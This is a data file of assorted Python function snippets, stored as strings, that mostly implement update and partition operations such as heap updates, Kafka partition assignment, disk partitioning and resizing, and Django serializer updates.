"def hard_update(self,target, source):\n\t\tfor target_param, param in zip(target.parameters(), source.parameters()):\n\t\t\t\ttarget_param.data.copy_(param.data)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def provide_partition_info(self):\n self.partition_info = True",
"def get_assignment_for_partition_update(self, topic_name, partitions):\n all_brokers = []\n assign = {'partitions': {}, 'version': 1}\n\n _, _, _, replicas, _, _ = self.get_partitions_for_topic(topic_name)[0]\n total_replica = len(replicas)\n\n for node_id, _host, _port, _rack in self.get_brokers():\n all_brokers.append(node_id)\n brokers_iterator = itertools.cycle(all_brokers)\n\n for i in range(partitions):\n assign_tmp = []\n for _j in range(total_replica):\n assign_tmp.append(next(brokers_iterator))\n assign['partitions'][str(i)] = assign_tmp\n\n return bytes(str(json.dumps(assign)).encode('ascii'))",
"def expand_second_partition(device):\n\n print('Deleting the original boot partition from the thumb drive')\n _delete_partition(device, 1)\n\n print('Expanding the partition. Resizing isn\\'t worth it. Or obvious to do.')\n resize_command = ['sudo', 'parted', device.path, 'resizepart', '2', '\"-1s\"']\n interactive_console(resize_command)\n\n print('Fixing the nibbly bits for the partition itself')\n target_partition = device.partitions(full_paths=True)[0]\n interactive_console(['sudo', 'e2fsck', '-f', target_partition])\n\n print('Fixing ext4 so it goes all the way to the end')\n target_end = device.partition_specs(2)['End']\n interactive_console(['sudo', 'resize2fs', target_partition, target_end])\n\n print('Success!')",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def set_partition(self, partition=0):\n if not isinstance(partition, int):\n raise TypeError('partition must be an integer')\n if partition <= 0:\n raise ValueError('partition must be positive')\n if self.connected:\n self.producer.send(\"PART:\"+str(partition))",
"def perform_swap(self, replica_i, replica_j):\n param_i = replica_i.parameter\n replica_i.parameter = replica_j.parameter\n replica_j.parameter = param_i",
"def update_device(self, dev_dict):\n # Note(jprabh1x): added bus,slot,function into fields dict as \n # seperate fields.\n no_changes = ('status', 'instance_uuid', 'id', 'extra_info', 'workload')\n map(lambda x: dev_dict.pop(x, None),\n [key for key in no_changes])\n\n # Note(jprabh1x): populating values for bus,slot,function from address in dev_dict.\n if dev_dict.has_key(\"address\"):\n \t\taddress = pci_utils.parse_address(dev_dict[\"address\"])\n \t\tdev_dict.update({'bus':str(address[1]), 'slot':str(address[2]), 'function':str(address[3])})\n for k, v in dev_dict.items():\n if k in self.fields.keys():\n self[k] = v\n else:\n extra_info = self.extra_info\n extra_info.update({k: str(v)})\n self.extra_info = extra_info",
"def update(self, other):\n _merge_dicts(self, other)",
"def on_edit_clicked(self,button):\n\t\tself.list_partitions.edit_partition()",
"def perform_update(self, serializer):\n extra_data = self.get_additional_data(False)\n serializer.save(**extra_data)",
"def update(self, xnew, ynew):\n # define old snapshots to be discarded\n xold, yold = self.Xw[:,0], self.Yw[:,0]\n # Update recent w snapshots\n self.Xw = np.column_stack((self.Xw[:,1:], xnew))\n self.Yw = np.column_stack((self.Yw[:,1:], ynew))\n \n # direct rank-2 update\n # define matrices\n U, V = np.column_stack((xold, xnew)), np.column_stack((yold, ynew))\n C = np.diag([-(self.weighting)**(self.w),1])\n # compute PkU matrix matrix product beforehand\n PkU = self.P.dot(U)\n # compute AkU matrix matrix product beforehand\n AkU = self.A.dot(U)\n # compute Gamma\n Gamma = np.linalg.inv(np.linalg.inv(C)+U.T.dot(PkU))\n # update A\n self.A += (V-AkU).dot(Gamma).dot(PkU.T)\n # update P\n self.P = (self.P - PkU.dot(Gamma).dot(PkU.T))/self.weighting\n # ensure P is SPD by taking its symmetric part\n self.P = (self.P + self.P.T)/2\n \n # time step + 1\n self.timestep += 1",
"def addPartition(self,partitionData):\n self.PCAs[partitionData.id] = partitionData\n self.pcaStatemachineLock[partitionData.id] = threading.Lock()\n self.StateMachineForPca[partitionData.id] = Statemachine(self.StateMachineFile,\"Unconfigured\")\n self.isPCAinTransition[partitionData.id] = False\n self.pcaSequenceNumber[partitionData.id] = 0",
"def update_inplace_from(self, other):\n self.__dict__ = other.__dict__.copy()",
"def _deploy_athena_partition_refresh():\n athena_package = AthenaPackage(config=config, version=current_version)\n athena_package.create_and_upload()\n return athena_package",
"def hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)",
"def update(self, other):\n for name, value in other.items():\n self.__setitem__(name, value)",
"def update(self, other):\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Torrent):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, idx: int, new_priority: T.Union[int, float]):\n old_priority, item = self.__heap[idx]\n self.__heap[idx] = (new_priority, item)\n\n if new_priority < old_priority:\n self.__sift_up(idx)\n else:\n self.__sift_down(idx)",
"def update(self,\n tier1_id,\n segment_id,\n port_id,\n segment_port,\n ):\n return self._invoke('update',\n {\n 'tier1_id': tier1_id,\n 'segment_id': segment_id,\n 'port_id': port_id,\n 'segment_port': segment_port,\n })",
"def update(self):\n with managed_session() as session:\n session.merge(self)",
"def update(self):\n if self._skip_update:\n self._skip_update = False\n return\n\n try:\n for prop in AIRER_PROPS:\n self.status[prop] = self.send('get_prop', [prop])[0]\n _LOGGER.debug(\"MiioDevice update: %s\", self.status)\n self.available = True\n self._retry = 0\n except Exception as exc:\n _LOGGER.error(\"Error on update: %s\", exc)\n self._retry += 1\n if self._retry > 3:\n self.available = False\n\n for entity in self.update_entities:\n entity.async_schedule_update_ha_state()",
"def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)",
"def partition_book(self):\n ...",
"def test_partially_update_device_by_id1(self):\n pass",
"def partitions_updater(self, user):\n for partition in ['boot_id', 'root_id', 'swap_id']:\n if (partition in user) and \\\n (user[partition] in self.system['partitions']):\n self.system['partitions'].remove(user[partition])\n\n return self.system['partitions']",
"def update(self, instance, validated_data):\n\n # If an order is cancelled or delivered, it cannot be modified.\n if instance.status == CANCELLED or instance.status == DELIVERED:\n raise exceptions.PermissionDenied('This order cannot be modified.')\n\n # If an order is already confirmed but UI/agent sends another confirmation request by mistake,\n # we deny it as each confirmation is a big operation that includes generating invoices/ledger entries.\n if instance.status == validated_data['status'] == CONFIRMED:\n raise exceptions.PermissionDenied('This order is already confirmed.')\n\n if instance.status == ACCEPTED and validated_data['status'] == CONFIRMED:\n # 1. Transition: accepted -> confirmed\n instance.status = validated_data.get('status')\n elif instance.status == CONFIRMED and validated_data['status'] in [CANCELLED, DELIVERED]:\n # 2. Transition: confirmed -> cancelled/delivered and return\n instance.status = validated_data.get('status')\n instance.save(update_fields=['status'])\n return instance\n else:\n # In case of any invalid transition, reject it.\n raise exceptions.PermissionDenied('There seems to be some discrepancy. Please contact your agent.')\n\n # Get exclusive lock on all relevant data rows\n orderlines = instance.orderlines.select_for_update().select_related('product').all()\n\n # Do order and product update in a single transaction\n with transaction.atomic():\n\n # Validate that order can be approved.\n self._validate_units_and_balance_in_orderlines(orderlines, instance.user)\n\n for orderline in orderlines:\n\n # Decrement product stock count by orderline(buying) requirement\n product = orderline.product\n product.units = F('units') - orderline.units\n product.save(update_fields=['units'])\n\n # Lock current standing price into the orderline, calculate sub total and lock it.\n product_price = product.price\n orderline.confirmed_price = product_price\n orderline.locked = CONFIRMED\n orderline.sub_total = product_price * F('units')\n orderline.save(update_fields=['confirmed_price', 'locked', 'sub_total'])\n\n # Mark order as confirmed.\n instance.save(update_fields=['status'])\n return instance",
"def newpart(self, device, primary, ncyls, swap=False):\n # This is a simple partitioning tool, which only supports\n # adding partitions sequentially, with all primary partitions\n # being before the extended partition, so once a logical\n # partition has been added, it is not possible to add further\n # primary ones.\n di = DiskInfo(device)\n pmax = 0 # Record highest partition number\n lim = -1 # Used for seeking last used cylinder\n exp = 0 # Number of extended partition\n ex0, ex1 = 0, -1 # Extended partition start and end\n log0, log1 = 0, -1 # Start and end of area used by logical partitions\n for p in di.parts:\n pn = int(p[0][len(device):])\n scyl, ecyl = p[1:3]\n if pn <= 4:\n if exp:\n run_error(_(\"Not supported: primary partition (%s%d)\\n\"\n \"has higher partition number than extended \"\n \"partition\") % (device, pn))\n return \"\"\n if scyl <= lim:\n run_error(_(\"Partitions must be ordered on the device.\\n\"\n \"%s%d is out of order.\") % (device, pn))\n return \"\"\n if p[3] in (\"5\", \"f\"):\n # extended\n exp = pn\n ex0, ex1 = scyl, ecyl\n continue\n pmax = pn\n lim = ecyl\n\n startcyl = lim + 1\n endcyl = lim + ncyls\n if endcyl >= di.drvcyls:\n run_error(_(\"Too little space at end of drive for new partition\"))\n return \"\"\n if exp and (pmax <= 4):\n # Remove the extended partition, which is empty anyway\n if not self.rmpart(device, exp):\n return \"\"\n pmax = exp - 1\n if primary:\n if pmax >= 4:\n run_error(_(\"Cannot add primary partition to %s\") % device)\n return \"\"\n t = \"primary\"\n else:\n t = \"logical\"\n if pmax > 4:\n # resize extended partition\n if not self.xcheck(\"resizepart\", device, str(exp),\n str(ex0), str(endcyl),\n onfail=_(\"Couldn't resize extended partition %s%d\")\n % (device, exp)):\n return False\n else:\n # create extended partition\n if not self.xcheck(\"newpart\", device,\n str(startcyl), str(endcyl), \"extended\",\n onfail=_(\"Couldn't create extended partition on %s\")\n % device):\n return False\n if pmax < 4:\n pmax = 4\n\n if self.xcheck(\"newpart\", device, str(startcyl), str(endcyl),\n t, \"linux-swap\" if swap else \"ext2\"):\n return \"%s%d\" % (device, pmax + 1)\n else:\n run_error(_(\"Couldn't add new partition to %s\") % device)\n return \"\"",
"def update(self, other):\n\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Session):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, **values):\r\n if self.__abstract__:\r\n raise ThunderdomeException('cant update abstract elements')\r\n self.pre_update(**values)\r\n for key in values.keys():\r\n if key not in self._columns:\r\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\r\n\r\n for k,v in values.items():\r\n setattr(self, k, v)\r\n\r\n return self.save()",
"def partition_session(self):\n if self.user['drive']['name'] is not None:\n\n # Set root size\n if self.user['root_freespace'] is True:\n self.user['root_size'] = 'freespace'\n\n # Set partition parameters\n self.user['partitions'] = {'name': ['boot', 'root'],\n 'size': [self.user['boot_size'],\n self.user['root_size']],\n 'filesystem': ['fat32', 'ext4'],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap size and filesystem\n if 'Swap' in self.user['optional_partitions']:\n self.user['partitions']['size'].insert(1, self.user['swap_size'])\n self.user['partitions']['filesystem'].insert(1, 'swap')\n\n # Set home size and filesystem\n if 'Home' in self.user['optional_partitions']:\n if self.user['home_freespace'] is True:\n self.user['home_size'] = 'freespace'\n self.user['partitions']['size'].append(self.user['home_size'])\n self.user['partitions']['filesystem'].append('ext4')\n\n # Custom partitions\n else:\n\n # Set partition parameters\n self.user['partitions'] = {\n 'name': ['boot', 'root'],\n 'drive_id': [self.user['boot_id'].split()[0],\n self.user['root_id'].split()[0]],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap drive ID\n if self.user['swap_id'] is not None:\n self.user['partitions']['drive_id'].insert(\n 1, self.user['swap_id'].split()[0])\n\n # Set home drive ID\n if self.user['home_id'] is not None:\n self.user['partitions']['drive_id'].append(\n self.user['home_id'].split()[0])\n\n # Set swap parameters\n if ('Swap' in self.user['optional_partitions']) or \\\n (self.user['swap_id'] is not None):\n self.user['partitions']['name'].insert(1, 'swap')\n self.user['partitions']['mountpoint'].insert(1, 'swap')\n self.user['partitions']['mountorder'].insert(1, 2)\n\n # Set home parameters\n if 'Home' in self.user['optional_partitions'] or \\\n (self.user['home_id'] is not None):\n self.user['partitions']['name'].append('home')\n self.user['partitions']['mountpoint'].append('/mnt/home')\n self.user['partitions']['mountorder'].append(3)",
"def FormatPartition(self, partition):\n\n fstab = self.fstab\n if fstab:\n p = fstab[partition]\n self.script.append('format(\"%s\", \"%s\", %s, \"%s\", \"%s\");' %\n (p.fs_type, common.PARTITION_TYPES[p.fs_type],\n self._GetSlotSuffixDeviceForEntry(p),\n p.length, p.mount_point))",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def sync_table_partitions(self) -> None:\n log.info(\"== Stage 5.1: Check table partitions are up-to-date ==\")\n\n # we're using partitions in the ddl file, skip syncing anything\n if not self.rm_partition:\n return\n # not a partitioned table, nothing to do\n if not self.partitions:\n return\n\n # only apply this logic to RANGE partitioning, as other types\n # are usually static\n partition_method = self.get_partition_method(\n self._current_db, self.new_table_name\n )\n if partition_method != \"RANGE\":\n return\n\n try:\n new_tbl_parts = self.list_partition_names(self.new_table_name)\n orig_tbl_parts = self.list_partition_names(self.table_name)\n\n parts_to_drop = set(new_tbl_parts) - set(orig_tbl_parts)\n parts_to_add = set(orig_tbl_parts) - set(new_tbl_parts)\n\n # information schema literally has the string None for\n # non-partitioned tables. Previous checks *should* prevent us\n # from hitting this.\n if \"None\" in parts_to_add or \"None\" in parts_to_drop:\n log.warning(\n \"MySQL claims either %s or %s are not partitioned\",\n self.new_table_name,\n self.table_name,\n )\n return\n\n if parts_to_drop:\n log.info(\n \"Partitions missing from source table \"\n \"to drop from new table %s: %s\",\n self.new_table_name,\n \", \".join(parts_to_drop),\n )\n if parts_to_add:\n log.info(\n \"Partitions in source table to add to new table %s: %s\",\n self.new_table_name,\n \", \".join(parts_to_add),\n )\n self.apply_partition_differences(parts_to_drop, parts_to_add)\n except Exception:\n log.exception(\n \"Unable to sync new table %s with orig table %s partitions\",\n self.new_table_name,\n self.table_name,\n )",
"def update_orderbook(self, existing_orderbook_obj, instrument, market_place, market_segment, market_capability, \\\n tick_size_list, round_lot, day_count, orderbook_name, tiering_level, orderbook_curr=None):\n logger.DLOG(\"Updating orderbook...\") \n clone_obj = existing_orderbook_obj.Clone()\n clone_obj.Instrument = instrument\n if orderbook_curr:\n clone_obj.Currency = orderbook_curr\n else:\n clone_obj.Currency = instrument.Currency()\n clone_obj.Quotation = instrument.Quotation()\n clone_obj.MarketPlace = market_place\n clone_obj.RoundLot = self.get_round_lot(instrument, round_lot)\n #clone_obj.PhysicalMarketSegment(market_segment)\n clone_obj.Name = orderbook_name\n clone_obj.QuoteFactor = 1\n clone_obj.TickSizeList = self.get_tick_size_list(tick_size_list, market_capability)\n if str(tiering_level):\n clone_obj.ExternalType = tiering_level\n clone_obj.ExternalId = orderbook_name\n\n try: \n existing_orderbook_obj.Apply(clone_obj)\n existing_orderbook_obj.Commit() \n \n #group_map = self.get_list_leaf(clone_obj,market_segment) \n #if group_map and clone_obj.GroupMaps().IndexOf(group_map) <0 :\n # clone_obj.GroupMaps().Add(group_map) \n # clone_obj.GroupMaps().Commit() \n \n logger.LOG(\"**Successfully** updated orderbook information: <%s> for instrument <%s>\"%(orderbook_name, instrument.Name()))\n except Exception as e:\n logger.ELOG('**Error** while updating OrderBook %s : %s'%(orderbook_name, e))",
"def update(self, key, node, local_edges, foreign_edges, transaction_id):\n assert self.row_exists(key, transaction_id), \"Key does not exist\"\n\n last_node = self.rows[key][-1]\n node = last_node.copy(node, local_edges, foreign_edges, transaction_id)\n self._create_or_update_row(key, node)",
"def update(self, initial, follows):",
"def update(self):\n self._g, self._B = self._constraint_assembler.preallocate_g_and_B(self._no_of_dofs_unconstrained,\n self._dofidxs(),\n self._no_of_constraints_by_object())",
"def partitionname(self, partitionname) :\n\t\ttry :\n\t\t\tself._partitionname = partitionname\n\t\texcept Exception as e:\n\t\t\traise e",
"def _update(self, datapoints):\r\n if len(datapoints) == 1:\r\n timestamp, value = datapoints[0]\r\n whisper.update(self.path, value, timestamp)\r\n else:\r\n whisper.update_many(self.path, datapoints)",
"def update_attr(self):\n\n # Retrieve all current values\n all_values = nx.get_node_attributes(self.G, 'value')\n\n new_values = {}\n\n # Loop over all nodes\n for i in range(self.n_v):\n\n # Obtain list of neighbors\n neighbors = list(nx.all_neighbors(self.G, i))\n\n # Compute part dependent on own node\n val_i = all_values[i]\n new_value = (1 - self.eps) * (1 - self.a * val_i * val_i)\n\n # Compute part dependent on neighbor nodes\n neighbors_value = 0\n for neighbor in neighbors:\n val_n = all_values[neighbor]\n neighbors_value += (1 - self.a * val_n * val_n)\n\n # Catch nodes without neighbors\n try:\n new_value += neighbors_value * (self.eps/len(neighbors))\n except ZeroDivisionError:\n pass\n\n # Save new value\n new_values[i] = {'value': new_value}\n\n nx.set_node_attributes(self.G, new_values)",
"def update(self, instance, validated_data):\n instance.product_name = validated_data.get('product_name', instance.product_name)\n instance.product_mrp = validated_data.get('product_mrp', instance.product_mrp)\n instance.save()\n return instance",
"def update(self, dbase):\n dbase.updateVirtualSpace(\n self.__id,\n self.__name,\n self.__host,\n self.__size\n )",
"def testUpdate(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath, useCache=False)\n pD = {self.__provKeyName: self.__provInfoL}\n ok = provU.store(pD)\n self.assertTrue(ok)\n #\n ok = provU.update(pD)\n self.assertTrue(ok)\n #\n fD = provU.fetch()\n self.assertTrue(self.__provKeyName in fD)\n self.assertDictEqual(pD, fD)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()",
"def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')",
"def close(self, **kwargs):\n config = getattr(self, \"config\", None)\n\n if config is None:\n return\n\n if kwargs:\n config.update(kwargs)\n\n original = getattr(self, \"_original\", None)\n logger.partitioning(\"Partition.close: original = {}\".format(original))\n\n if not original:\n originally_on_disk = False\n original_subarray = None\n else:\n originally_on_disk = not original.in_memory\n original_subarray = original._subarray\n\n config = self.config\n logger.partitioning(\" config = {}\".format(config))\n\n if config[\"serial\"]:\n # --------------------------------------------------------\n # SERIAL\n # --------------------------------------------------------\n logger.partitioning(\" serial\")\n\n if config[\"readonly\"]:\n logger.partitioning(\" readonly=True\")\n\n if originally_on_disk:\n logger.partitioning(\" subarray originally on disk\")\n\n if config.get(\"to_disk\", False):\n # 1.1.1.1 The original subarray was on disk,\n # we don't want to keep the current\n # subarray in memory, and we are happy\n # to discard any changes that may have\n # been made to the subarray.\n logger.partitioning(\" 1.1.1.1 revert\")\n self.revert()\n elif free_memory() <= cf_fm_threshold():\n # 1.1.1.2 The original subarray was on disk,\n # we are happy to keep the current\n # subarray in memory, but there is not\n # enough free memory to do so.\n logger.partitioning(\n \" 1.1.1.2 revert ({} <= {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n self.revert()\n else:\n # 1.1.1.3 The original subarray was on disk\n # and there is enough memory to keep\n # the current subarray in memory\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # The original subarray was a temporary\n # file which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n del self.masked\n logger.partitioning(\n \" 1.1.1.3 del masked ({} > {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n\n else:\n logger.partitioning(\" subarray originally in memory\")\n if config.get(\"to_disk\", False):\n # 1.1.2.1 Original subarray was in memory and\n # we don't want to keep the current\n # subarray in memory\n logger.partitioning(\" 1.1.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.1.2.2 Original subarray was in memory and\n # unique but there is not enough\n # memory to keep the current subarray\n logger.partitioning(\" 1.1.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.1.2.3 Original subarray was in memory and\n # unique and there is enough memory to\n # keep the current subarray in memory\n logger.partitioning(\" 1.1.2.3 pass\")\n pass\n else:\n # config['readonly'] is False\n if originally_on_disk:\n if config.get(\"to_disk\", False):\n # 1.2.1.1 Original subarray was on disk and\n # there and we don't want to keep the\n # array\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.1.2 Original subarray was on disk but\n # there is not enough memory to keep\n # it\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by 
any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.1.3 Original subarray was on disk and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.1.3 pass\")\n del self.masked\n else:\n if config.get(\"to_disk\", False):\n # 1.2.2.1 Original subarray was in memory but\n # we don't want to keep it\n logger.partitioning(\" 1.2.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.2.2 Original subarray was an in memory\n # but there is not enough memory to\n # keep it\n logger.partitioning(\" 1.2.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.2.3 Original subarray was in memory and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.2.3 del masked\")\n del self.masked\n else:\n logger.partitioning(\"Partition.close: parallel\")\n # --------------------------------------------------------\n # PARALLEL\n # --------------------------------------------------------\n pass\n\n # if hasattr(self, '_original'):\n # del self._original\n\n # print(hasattr(self, 'config')),\n try:\n del self.config\n except AttributeError:\n pass",
"def before_update(mapper, conn, target):\n if not target.id_:\n dataset = ObjectNumber.parse(target.d_id)\n target.id_ = str(PartitionNumber(dataset, target.sequence_id))",
"def provision(self, orig_name, new_name, mesh_role):\n self.clear_list()\n self.read_bootinfo(orig_name)\n self.copy_prov(orig_name)\n self.ap_prov(new_name, mesh_role)\n self.ap_reprovision(orig_name)",
"def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]",
"def _update(self, other):\n # NOTE: detail map properties should NEVER be overridden. NEVER. EVER. kthx.\n if other.use_alpha:\n self.use_alpha = True\n if other.mipmap:\n self.mipmap = True",
"def update_dict(new,old):",
"def partition(attrs, df, partitions):\n if attrs in partitions:\n return partitions[attrs]\n shape = df.drop_duplicates(attrs).shape[0]\n partitions[attrs] = shape\n return shape",
"def update_attr_par(self):\n\n # Retrieve all current values\n self.all_values_temp = nx.get_node_attributes(self.G, 'value')\n\n # Calculate all new values\n new_values_list = Parallel(n_jobs=2)(delayed(self.single_node_update)(i) \\\n for i in range(self.n_v))\n\n # # Set list to dict as needed for node update\n # new_values_dict = {}\n # for i, value in enumerate(new_values_list):\n # new_values_dict[i] = {'value': value}\n #\n # # Update node value\n # nx.set_node_attributes(self.G, new_values_dict)",
"def _pd_update(pd, fields):\n pd.name = fields['name']\n pd.price = fields['price']\n pd.quantity_per_package = fields['quantity_per_package']\n pd.unit = fields['unit']\n pd.quantity_limit = fields['quantity_limit']\n pd.unit_weight = fields['unit_weight']\n pd.quantum = fields['quantum']",
"async def update_derived_data(self, pair):\n\n await self.update_adjusted_tick_data(pair)\n await self.update_mas(pair)\n await self.update_emas(pair)\n await self.filter_mas(pair)\n await self.filter_emas(pair)\n await self.update_bbands(pair)\n await self.refresh_indicators(pair)",
"def update_one_node_from_pbs_data(node, attr_dict):\n # put node under a subcluster if it does not have any yet\n if not node.subcluster:\n for id,node_regexp in SubCluster.objects.filter(server=node.server).values_list('id','node_regexp'):\n if re.match(node_regexp,node.name):\n node.subcluster_id = id\n node.save()\n break\n # fill node's np if it is not present\n if not node.np:\n node.np = attr_dict['np']\n node.save()\n\n new_states = []\n if attr_dict.has_key('state'):\n# node.state.clear()\n for statename in attr_dict['state'].split(','):\n #node.state.add(NodeState.objects.get(name=statename.strip()))\n new_states.append(NodeState.objects.get(name=statename.strip()))\n attr_dict['state'] = new_states\n\n\n new_properties = []\n if attr_dict.has_key('properties'):\n# node.properties.clear()\n for propertyname in attr_dict['properties'].split(','):\n np,created = NodeProperty.objects.get_or_create(name=propertyname.strip())\n if created:\n print(\"New property created: %s\" % propertyname)\n new_properties.append(np)\n# node.properties.add(np)\n attr_dict['properties'] = new_properties\n\n new_jobs = []\n if attr_dict.has_key('jobs'):\n slot_jobs = dict([tuple(j.strip().split('/')) for j in attr_dict['jobs'].split(',')])\n for slotstr, longjobid in slot_jobs.items():\n slot = int(slotstr)\n# js,created = getJobSlot(slot=slot,node=node)\n# if created:\n# logging.info(\"new jobslot will be created: slot: %d, node name: %s\" % (slot,name))\n jobid = int(longjobid.split('.')[0])\n new_jobs.append(jobid)\n \n# js.livejob,created = LiveJob.objects.get_or_create(jobid=jobid, server=node.server)\n# if created:\n# logging.info(\"new livejob created: %d\" % jobid)\n# js.save()\n attr_dict['jobs'] = new_jobs\n return attr_dict",
"def update_item(self, descriptor, user_id, allow_not_found=False, force=False, **kwargs): # lint-amnesty, pylint: disable=arguments-differ\n partitioned_fields = self.partition_xblock_fields_by_scope(descriptor)\n return self._update_item_from_fields(\n user_id, descriptor.location.course_key, BlockKey.from_usage_key(descriptor.location),\n partitioned_fields, descriptor.definition_locator, allow_not_found, force, **kwargs\n ) or descriptor",
"def update(self):\n self.__execute(self.pkgin_bin, \"update\")",
"def copy(self):\n new = Partition.__new__(Partition)\n new.__dict__ = self.__dict__.copy()\n\n self._increment_file_counter()\n\n return new",
"def _update(self, context, values, prune_stats=False):\n return db.compute_node_update(context, self.compute_node['id'],\n values, prune_stats)",
"def update(self):\n raise NotImplementedError",
"def update(self, other):\n if self.active:\n self.active.functor.update(other)",
"def partition_key(self, partition_key):\n\n self._partition_key = partition_key",
"def free(self,partition,runinfo_dp):\n if self.load():\n res = Online.PVSS.StringVector()\n dpv = Online.PVSS.DataPointVector()\n for i in xrange(len(self.inUse.data)):\n n = self.subfarms.data[i]\n f = self.inUse.data[i]\n if f==partition:\n res.push_back('')\n dpv.push_back(self.dp2(self.name+'_'+n,'UsedBy'))\n dpv.back().data = ''\n dpv.push_back(self.dp2(self.name+'_'+n,'RunInfo'))\n dpv.back().data = ''\n dpv.push_back(self.dp2(self.name+'_'+n,'Activity'))\n dpv.back().data = ''\n else:\n res.push_back(f)\n if len(runinfo_dp)>0:\n #dpv.push_back(self.dp2(runinfo_dp,'general.partName'))\n #dpv.back().data = ''\n #dpv.push_back(self.dp2(runinfo_dp,'HLTFarm.nSubFarms'))\n #dpv.back().data = 0\n dpv.push_back(self.dp2(runinfo_dp,'HLTFarm.subFarms'))\n dpv.back().data = Online.PVSS.StringVector()\n self.inUse.data = res\n self.writer.add(dpv)\n self.writer.add(self.inUse)\n if self.writer.execute():\n return 'SUCCESS'\n return self.error('Failed to update deallocation information for partition '+\\\n partition+' in farm system:'+self.name)\n return self.error('Failed to load information for partition '+partition+\\\n ' in farm system:'+self.name)",
"def update(self):\n diff = self._diff()\n if not diff:\n # Nothing to do!\n return\n self.parent.update_node(self, diff)",
"def update(self, other={}, **kwargs):\n joined = dict(other, **kwargs)\n\n # Update with the new set of k:v pairs,\n # but delete existing keys which are being assigned the value of None\n for k, v in joined.items():\n if v is None:\n if k in self:\n del self[k]\n else:\n self[k] = v",
"def test_update_values(self):\r\n partition = uuid4()\r\n for i in range(5):\r\n TestQueryUpdateModel.create(partition=partition, cluster=i, count=i, text=str(i))\r\n\r\n # sanity check\r\n for i, row in enumerate(TestQueryUpdateModel.objects(partition=partition)):\r\n assert row.cluster == i\r\n assert row.count == i\r\n assert row.text == str(i)\r\n\r\n # perform update\r\n TestQueryUpdateModel.objects(partition=partition, cluster=3).update(count=6)\r\n\r\n for i, row in enumerate(TestQueryUpdateModel.objects(partition=partition)):\r\n assert row.cluster == i\r\n assert row.count == (6 if i == 3 else i)\r\n assert row.text == str(i)",
"def refresh(self, context=None):\n current = self.__class__.get_by_uuid(self._context,\n cluster=self.cluster_id,\n uuid=self.uuid)\n for field in self.fields:\n if self.obj_attr_is_set(field) and self[field] != current[field]:\n self[field] = current[field]",
"def _update(self, priority, key):\n i = self._index[key]\n item = self._heap[i]\n old_priority = item.priority\n item.priority = priority\n if priority < old_priority:\n self._sift_up(i)\n else:\n self._sift_down(i)",
